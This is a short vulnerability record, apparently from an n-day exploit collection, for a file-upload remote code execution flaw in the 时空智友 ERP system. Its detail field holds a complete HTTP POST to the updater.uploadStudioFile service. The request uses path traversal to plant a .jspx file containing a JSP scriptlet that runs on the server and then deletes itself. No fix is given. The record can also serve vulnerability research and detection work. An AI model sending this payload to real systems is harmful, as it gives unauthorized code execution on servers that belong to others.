vendor = "时空智友"
name = "时空智友ERP系统 updater.uploadStudioFile 文件上传"
type = "RCE"
version = "未知"
path = "/formservice"
detail = "POST /formservice?service=updater.uploadStudioFile HTTP/1.1 Host: xxxx.com Content-Type: application/x-www-form-urlencoded content=<updater xmlns:jsp=\"http://java.sun.com/JSP/Page\"><filename>test.jspx</filename><filepath>../../../images/</filepath><filesize>347</filesize><lmtime>{{time()}}</lmtime><jsp:scriptlet>out.println(java.util.UUID.randomUUID().toString());new java.io.File(application.getRealPath(request.getServletPath())).delete();</jsp:scriptlet></updater>"
fix = "未知"
date = "0708"
label = "nday"
verifier = "AdySec"
